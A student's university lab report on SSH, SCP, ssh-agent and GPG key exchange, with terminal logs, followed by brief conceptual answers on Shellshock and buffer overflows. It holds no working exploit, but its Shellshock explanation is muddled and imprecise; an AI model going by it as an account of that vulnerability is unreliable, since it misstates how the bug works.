### CprE 308 Report - Lab 12##### By: Thomas Moll - Lab Section B#### Part 1:

1. ### CprE 308 Report - Lab 12
2. ##### By: Thomas Moll - Lab Section B
3.  
4. #### Part 1: SSH
5.  
6. ##### 3.1.2
7. After running `ls` from linux-1.ece.iastate.edu the following output
8. ~~~
9. [~/cpre308]
10. quanta-> ls
11. Debian-Jessie-AMD64-root_fs labs linux-4.4.3 newfile setup_labs.sh
12. ~~~
13. The output is coming from the remote machine.
14.  
15. ~~~
16. [~]
17. quanta-> ssh -l quanta linux-1.ece.iastate.edu
18. quanta@linux-1.ece.iastate.edu's password:
19.  
20. Logged into linux-1.ece.iastate.edu
21. Welcome Thomas
22. [~]
23. quanta->
24. ~~~
25.  
26. ~~~
27. [~]
28. quanta-> ssh quanta@linux-1.ece.iastate.edu
29. quanta@linux-1.ece.iastate.edu's password:
30.  
31. Logged into linux-1.ece.iastate.edu
32. Welcome Thomas
33. [~]
34. quanta->
35. ~~~
36. Both are functionally the same!
37.  
38. ##### 3.1.3
39. SCP command to linux-1 to get a test file.
40. ~~~
41. [~/cpre308]
42. quanta-> scp quanta@linux-1.ece.iastate.edu:cpre308/SCP_Test.txt .
43. quanta@linux-1.ece.iastate.edu's password:
44. SCP_Test.txt 100% 0 0.0KB/s 00:00
45.  
46. [~/cpre308]
47. quanta-> cat SCP_Test.txt
48. HELLO WORLD!
49. ~~~
50.  
51. SCP command to a more remote server to get another test file.
52. ~~~
53. [~/cpre308]
54. quanta-> scp thomas@thomasmoll.co:SCP_Test.txt .
55. thomas@thomasmoll.co's password:
56. SCP_Test.txt 100% 13 0.0KB/s 00:00
57.  
58. [~/cpre308]
59. quanta-> cat SCP_Test.txt
60. HELLO WORLD!
61. ~~~
62.  
63.  
64. Using `ssh` `scp` and `fg` we have the following.
65. ~~~
66. quanta->ssh linux-1.ece.iastate.edu
67. [~]
68. quanta-> ~^Z [suspend ssh]
69.  
70. [1]+ Stopped ssh linux-1.ece.iastate.edu
71. [~/cpre308]
72. quanta-> scp thomas@thomasmoll.co:SCP_Test.txt .
73. thomas@thomasmoll.co's password:
74. SCP_Test.txt 100% 13 0.0KB/s 00:00
75. [~/cpre308]
76. quanta-> fg
77. ssh linux-1.ece.iastate.edu
78.  
79. [~]
80. quanta-> hostname
81. linux-1.ece.iastate.edu
82. [~]
83. quanta->
84. ~~~
85.  
86.  
87.  
88. ##### 3.1.4
89.  
90. Below is one of my public keys from my known-hosts file. Pls don't haxor me.
91. ~~~
92. thomasmoll.co ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZrKnGcCgipIytH35H8t2Ak4gGFG2xzfFFqMpAwgFOPj0w6rV22ql/GvyR+T5GKAcbmH3C0iKsXRQRQAPDEsiSanDEZxt7+92SbiySfToDO1hHPpZkZqyuYyNjQvFkeL6jXqKeyb5uArPLw5HxQjFXnkEEIg85ljsQ7vAluCrquM0rmEUy7AhsE1FNVRuHL7YH04MM0ZYrbWcYz1D6i+QwYqKMVGVQIB4ecpe7pG/u6iM8/BCw+25BtU+sXHwylkTuJicZFf6z7wstbmbNINpqMcmpkx9momY769m6aLU1ZWShHYyQmIFcKAcMTUqmNlOXZ9YGbHWRRxVjk8nUf1x
93. 192.73.234.28 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZrKnGcCgipIytH35H8t2Ak4gGFG2xzfFFqMpAwgFOPj0w6rV22ql/GvyR+T5GKAcbmH3C0iKsXRQRQAPDEsiSanDEZxt7+92SbiySfToDO1hHPpZkZqyuYyNjQvFkeL6jXqKeyb5uArPLw5HxQjFXnkEEIg85ljsQ7vAluCrquM0rmEUy7AhsE1FNVRuHL7YH04MM0ZYrbWcYz1D6i+QwYqKMVGVQIB4ecpe7pG/u6iM8/BCw+25BtU+sXHwylkTuJicZFf6z7wstbmbNINpqMcmpkx9momY769m6aLU1ZWShHYyQmIFcKAcMTUqmNlOXZ9YGbHWRRxVjk8nUf1x
94. ~~~
95.  
96. In the `.ssh` directory, the file `id_rsa` contains my private key, the file `id_rsa.pub` contains my public key.
97. The passphrase is used to encrypt `id_rsa` so no rogue programs can copy the binary and impersonate me!
98.  
99. ##### 3.1.7
100. Since my home directory is mapped the keys were already transfered to the lab machine.
101. I don't need to input my actual password now!
102.  
103. The passphrase is used to decrypt my private key to authenticate with the server. It's not sent to the server, but instead used to verify the client private key pair on my end.
104.  
105. ~~~
106. quanta-> ssh-agent bash
107. bash-4.1$ ssh-add ~/.ssh/lab_key
108. Enter passphrase for /home/quanta/.ssh/lab_key:
109. Identity added: /home/quanta/.ssh/lab_key (/home/quanta/.ssh/lab_key)
110. bash-4.1$ ssh linux-3.ece.iastate.edu
111.  
112. Logged into linux-3.ece.iastate.edu
113. Welcome Thomas
114. [~]
115. quanta->
116. ~~~
117.  
118. ##### 3.2.1
119.  
120. GNUPG. So basically for this part I had to use my own VPS because these lab computers don't have enough entropy.
121. ~~~
122. thomas@quantumserver [11:25:58] [~]
123. -> % gpg --gen-key
124. gpg (GnuPG) 1.4.18; Copyright (C) 2014 Free Software Foundation, Inc.
125. This is free software: you are free to change and redistribute it.
126. There is NO WARRANTY, to the extent permitted by law.
127.  
128. Please select what kind of key you want:
129. (1) RSA and RSA (default)
130. (2) DSA and Elgamal
131. (3) DSA (sign only)
132. (4) RSA (sign only)
133. Your selection? 1
134. RSA keys may be between 1024 and 4096 bits long.
135. What keysize do you want? (2048)
136. Requested keysize is 2048 bits
137. Please specify how long the key should be valid.
138. 0 = key does not expire
139. <n> = key expires in n days
140. <n>w = key expires in n weeks
141. <n>m = key expires in n months
142. <n>y = key expires in n years
143. Key is valid for? (0)
144. Key does not expire at all
145. Is this correct? (y/N) y
146.  
147. You need a user ID to identify your key; the software constructs the user ID
148. from the Real Name, Comment and Email Address in this form:
149. "Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"
150.  
151. Real name: Thomas Moll
152. Email address: quanta@iastate.edu
153. Comment: Lab12
154. You selected this USER-ID:
155. "Thomas Moll (Lab12) <quanta@iastate.edu>"
156.  
157. Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
158. You need a Passphrase to protect your secret key.
159.  
160. We need to generate a lot of random bytes. It is a good idea to perform
161. some other action (type on the keyboard, move the mouse, utilize the
162. disks) during the prime generation; this gives the random number
163. generator a better chance to gain enough entropy.
164. ...+++++
165. .....+++++
166. We need to generate a lot of random bytes. It is a good idea to perform
167. some other action (type on the keyboard, move the mouse, utilize the
168. disks) during the prime generation; this gives the random number
169. generator a better chance to gain enough entropy.
170. .......+++++
171. +++++
172. gpg: key 83D22B6D marked as ultimately trusted
173. public and secret key created and signed.
174.  
175. gpg: checking the trustdb
176. gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
177. gpg: depth: 0 valid: 2 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 2u
178. pub 2048R/83D22B6D 2016-04-20
179. Key fingerprint = FF79 AF8A 5A50 64FD 308A DF99 6143 100E 83D2 2B6D
180. uid Thomas Moll (Lab12) <quanta@iastate.edu>
181. sub 2048R/3E685551 2016-04-20
182. ~~~
183.  
184. ~~~
185. -> % scp michael@michaelsnook.us:/home/michael/myname.gpg .
186. The authenticity of host 'michaelsnook.us (107.161.17.147)' can't be established.
187. RSA key fingerprint is 4a:8d:af:74:2d:2d:5b:53:f6:85:59:72:26:a8:59:4b.
188. Are you sure you want to continue connecting (yes/no)? yes
189. Warning: Permanently added 'michaelsnook.us,107.161.17.147' (RSA) to the list of known hosts.
190. michael@michaelsnook.us's password:
191. myname.gpg 100% 1216 1.2KB/s 00:00
192. (env) thomas@quantumserver [12:11:47] [~]
193. -> % ls
194. Python-3.5.0 gunicorn.conf nginx-4-12-16.tar.gz repos web
195. Python-3.5.0.tgz myname.gpg projects tom-home-4-12-16.tar.gz werc
196. SCP_Test.txt nginx python tom-key.gpg
197. (env) thomas@quantumserver [12:11:49] [~]
198. -> % gpg --install myname.gpg
199. gpg: Invalid option "--install"
200. (env) thomas@quantumserver [12:12:04] [~]
201. -> % gpg --import myname.gpg
202. gpg: key 68DAA02C: public key "Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>" imported
203. gpg: Total number processed: 1
204. gpg: imported: 1 (RSA: 1)
205. (env) thomas@quantumserver [12:12:10] [~]
206. -> % gpg --list-keys
207. /home/thomas/.gnupg/pubring.gpg
208. -------------------------------
209. pub 2048R/985B5355 2016-04-20
210. uid Thomas Moll (Lab12) <quanta@iastate.edu>
211. sub 2048R/C1FB4BB2 2016-04-20
212.  
213. pub 2048R/83D22B6D 2016-04-20
214. uid Thomas Moll (Lab12) <quanta@iastate.edu>
215. sub 2048R/3E685551 2016-04-20
216.  
217. pub 2048R/68DAA02C 2016-04-20
218. uid Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>
219. sub 2048R/F535694D 2016-04-20
220.  
221. ~~~
222.  
223. After we exchanged keys then I encrypted a file and sent it to him. We used SCP to transfer files.
224. ~~~
225. (env) thomas@quantumserver [12:15:07] [~]
226. -> % gpg --output secret.gpg --encrypt --recipient snook secret.txt
227. gpg: F535694D: There is no assurance this key belongs to the named user
228.  
229. pub 2048R/F535694D 2016-04-20 Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>
230. Primary key fingerprint: 6A93 F1A9 C4C7 3C9E A681 BE96 9AF3 4E2A 68DA A02C
231. Subkey fingerprint: CE6D 6F45 0F49 6F90 4AC6 942B DADA 8F87 F535 694D
232.  
233. It is NOT certain that the key belongs to the person named
234. in the user ID. If you *really* know what you are doing,
235. you may answer the next question with yes.
236.  
237. Use this key anyway? (y/N) y
238. ~~~
239.  
240. I then decrypted his document. Note that this process is the same for the keys, they're just files!
241. ~~~
242. (env) thomas@quantumserver [12:21:32] [~]
243. -> % scp michael@michaelsnook.us:/home/michael/doc.gpg .
244. michael@michaelsnook.us's password:
245. doc.gpg 100% 379 0.4KB/s 00:00
246. gpg: Invalid option "--ouptput"
247. (env) thomas@quantumserver [12:22:36] [~]
248. -> % gpg --output doc.txt --decrypt doc.gpg
249.  
250. You need a passphrase to unlock the secret key for
251. user: "Thomas Moll (Lab12) <quanta@iastate.edu>"
252. 2048-bit RSA key, ID C1FB4BB2, created 2016-04-20 (main key ID 985B5355)
253.  
254. gpg: encrypted with 2048-bit RSA key, ID C1FB4BB2, created 2016-04-20
255. "Thomas Moll (Lab12) <quanta@iastate.edu>"
256.  
257. (env) thomas@quantumserver [12:23:49] [~]
258. -> % cat doc.txt
259. Hey Tom! I hope you are doing well.
260. ~~~
261.  
262. ##### 3.2.4
263.  
264. We then signed and verified each others signatures
265.  
266. We used SCP to share the new files.
267. ~~~
268. (env) thomas@quantumserver [12:24:48] [~]
269. -> % gpg --output signed.gpg --sign tom-key.gpg
270.  
271. You need a passphrase to unlock the secret key for
272. user: "Thomas Moll (Lab12) <quanta@iastate.edu>"
273. 2048-bit RSA key, ID 985B5355, created 2016-04-20
274. ~~~
275.  
276.  
277. I verified his signature.
278. ~~~
279. (env) thomas@quantumserver [12:29:59] [~]
280. -> % scp michael@michaelsnook.us:/home/michael/myname_signed.gpg .
281. michael@michaelsnook.us's password:
282. myname_signed.gpg 100% 1544 1.5KB/s 00:00
283. (env) thomas@quantumserver [12:34:01] [~]
284. -> % ls
285. Python-3.5.0 doc.gpg myname_signed.gpg pub.gpg secret.txt web
286. Python-3.5.0.tgz doc.txt nginx python signed.gpg werc
287. SCP_Test.txt gunicorn.conf nginx-4-12-16.tar.gz repos tom-home-4-12-16.tar.gz
288. doc. myname.gpg projects secret.gpg tom-key.gpg
289. (env) thomas@quantumserver [12:34:03] [~]
290. -> % gpg --ouptput key.gpg --decrypt myname_signed.gpg
291. gpg: Invalid option "--ouptput"
292. (env) thomas@quantumserver [12:34:29] [~]
293. -> % gpg --output key.gpg --decrypt myname_signed.gpg
294. gpg: Signature made Wed Apr 20 12:32:29 2016 EDT using RSA key ID 68DAA02C
295. gpg: Good signature from "Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>"
296. gpg: WARNING: This key is not certified with a trusted signature!
297. gpg: There is no indication that the signature belongs to the owner.
298. Primary key fingerprint: 6A93 F1A9 C4C7 3C9E A681 BE96 9AF3 4E2A 68DA A02C
299. ~~~
300.  
301. ##### 3.3
302. Shellshock was caused by BASH variables not being escaped and allowing for them to run arbitrary code if they were escaped correctly. For example, if a web app did `get_env()` on a variable with bash code, it would execute that code which could be malicious. For example if a web server had a function to save a variable like Language or something, and it didn't sanitize the input. (I'm looking at you Javascript validation :P) we could easily save bad code for the program to run the next time it wanted to look up our language.
303.  
304. ##### 3.4
305. Buffer overflows! An attacker can cause a buffer overflow easily by doing a bunch of these `(((((((((((((((((((((((((((((((((((((((()))))))))))))))))))))))))))))))))))))))))` until the upperlimit variable exceeds the buffer, hence overflowining it.
306. Since the variable never gets decremented, the program will allow that variable to grow and grow.
307. Then from there arbitrary code can be injected and possibly run.
308.  
309. ##### Summary
310.  
311. In summary, I've learned a fair bit about SSH, SCP, GPG and Buffer Overflows. I've known about SSH, SCP, GPG for a while now. However, I didn't know about the escape command to temporarily run commands on the actual host you're running on. GPG I've used to encrypt my email for a number of years because I'm a bit paranoid about my communications (Unfortunately, I haven't figured out how to do this on iastate's email :().
312.  
313. I did learn a lot about buffer over flows from the provided material. I learned that they're the most widely used exploit because damn it's simple. Unlike stack pivoting which takes finese, buffer overflows are simple, especially paired with executable flags and shellcode, the world is your oyster.